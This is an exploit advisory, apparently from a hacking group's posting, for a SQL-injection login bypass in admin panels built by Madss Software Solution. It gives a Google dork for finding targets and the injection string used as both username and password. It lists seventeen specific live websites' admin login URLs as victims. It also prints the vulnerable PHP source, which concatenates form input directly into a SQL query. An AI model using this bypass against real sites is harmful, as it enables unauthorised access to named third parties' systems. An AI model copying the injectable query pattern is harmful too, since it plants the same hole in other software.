######################################### # Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://madsssoftwaresolution.com # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd." # # Date: 2014/4/13 # ########################################### # # Exploit : Login page bypass # # Location : [Target]/admin/login.php # # Username : '=' 'or' # # Password : '=' 'or' ###################### # Proof: # # http://www.artistmahendradubey.com/admin/login.php # # http://www.sardarenterprises.com/admin/login.php # # http://www.amritaorganic.com/admin/login.php # # http://www.kvmcpandhana.com/admin/login.php # # http://www.vikatsoft.com/admin/login.php # # http://www.narulamathsmagic.com/admin/login.php # # http://www.dayodayathirthborgaon.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.mnlawcollegekhandwa.com/admin/login.php # # http://www.guptashrikhandwa.com/admin/login.php # # http://www.apnagwalior.com/admin/login.php # # http://www.apnamorena.com/admin/login.php # # http://www.djpsbhikangaon.com/admin/login.php # # http://www.acmecoachingbhikangaon.com/admin/login.php # # http://www.sainisportsacademy.com/admin/login.php # # http://www.apnaburhanpur.com/admin/login.php # ############################################ Vulnerable Code <?php session_start(); error_reporting(0); include("config.php"); /*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="") { header("location:admin_home.php"); }*/ ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Admin Login</title> <link href="css/login.css" rel="stylesheet" type="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head> <body> <br /> <a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a> <div id="logincontainer"> <h1>Administrator</h1> <div id="loginbox"> <?php if(isset($_POST['submit'])) { $sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error()); if(mysql_num_rows($sql)>0) { $_SESSION["session_nickname"]=$_POST['username']; $_SESSION["type"]='admin'; ?> <script type="text/javascript"> window.location.href="admin_home.php";</script> <?php } else { $mass="Invalid user name or password. "; } ?> <tr> <td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; ?></strong></td> </tr> <?php } ?> <form method="post" /> <div class="inputcontainer"> <img src="./images/icons/icon_username.png" alt="Username" /> <label for="username">Username:</label> <input type="text" id="username" name="username" /> </div> <div class="inputcontainer"> <img src="./images/icons/icon_locked.png" alt="Password" /> <label for="password">Password:</label> <input type="password" id="password" name="password" /> </div> <input type="submit" name="submit" value="Login" class="loginsubmit" /> <p><a href="forget_password.php">Forgotten password</a></p> </form> </div> </div> </body> </html> ################################################### Milad Hacking We Love Mohammad Home Page : https://www.facebook.com/milad.hacking.5 Email: milad.hacking.blackhat[at]gmail.com Parcham balast ############################################ Special Tnx To My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th� mAnger , FaridP30 , AMoK , Azad� , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES� , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line ############################################ Never Forget My Top Friends <3 ############################################